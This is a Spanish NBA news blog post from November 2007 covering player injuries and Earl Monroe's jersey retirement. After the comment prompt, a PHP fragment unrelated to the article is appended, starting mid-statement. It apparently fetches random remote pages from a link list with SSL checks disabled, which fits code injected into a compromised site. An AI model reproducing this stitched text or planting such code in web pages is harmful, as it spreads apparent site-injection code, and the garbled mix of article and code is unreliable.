Noticias NBA (21/11/07)

21 de November de 2007 por Gallis

Varias lesiones marcan la actualidad en la jornada de hoy…

Los problemas de Jorge Garbajosa en Toronto continúan. Los Raptors han decidido incluirle en la lista de inactivos, tras realizarle una resonancia en su pierna izquierda. El equipo médico de la franquicia canadiense ha tomado esta decisión tras detectar algo inusual en la resonancia. Garbajosa no volverá a ser activado hasta que se descubra el alcance de estas anomalías.

Más lesiones y la retirada de camiseta de un grande, en el resto de las noticias del día:

La muñeca derecha va a mantener a Donyell Marshall fuera de las canchas durante, al menos, 2 meses. Ése es el resultado de las pruebas a las que el jugador se ha sometido este pasado martes. Hasta ahora, el jugador había permanecido con la muñeca en reposo durante los últimos 10 días. Ahora comienza la segunda fase de su proceso de recuperación, que le tendrá apartado del equipo entre 6 y 8 semanas.

Conley, base de Memphis Grizzlies, se perderá un mínimo de 2 ó 3 semanas debido a una lesión en su hombro derecho. El número 4 del pasado draft ha sido incluido en la lista de inactivos tras lesionarse el pasado sábado en el partido que enfrentó a su equipo con los Dallas Mavericks. En lo que llevamos de temporada, Conley ha jugado 5 partidos, con promedios de 5.6 puntos y 4.2 asistencias.

Mejores noticias podrían recibir en New Jersey en las próximas horas. Vince Carter ha vuelto a entrenarse con normalidad por primera vez desde que se lesionó el pasado 10 de noviembre frente a los Celtics. Al parecer, su tobillo ha respondido perfectamente, por lo que podría reaparecer esta noche frente a Portland. Su participación sería de vital importancia, ya que los Nets han perdido los cinco partidos en los que Vinsanity ha faltado.

Y acabamos con una noticia más amable. El próximo 1 de diciembre, los Washington Wizards retirarán la camiseta del mítico Earl ‘The Pearl’ Monroe, uno de los 50 mejores jugadores de los 50 primeros años de la NBA. La perla fue drafteado en 1967 por los Baltimore Bullets, equipo en el que jugó sus primeras 4 temporadas, antes de ser traspasado a los New York Knicks. Así pues, antes del partido que enfrentará a los Wizards con los Raptors, el número 10 del mítico Monroe colgará del techo del Verizon Center, junto al 11 de Elvin Hayes, el 25 de Gus Johnson y el 41 de Wes Unseld. Por cierto, que el número con el que jugó en New York, el 15, también está retirado.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>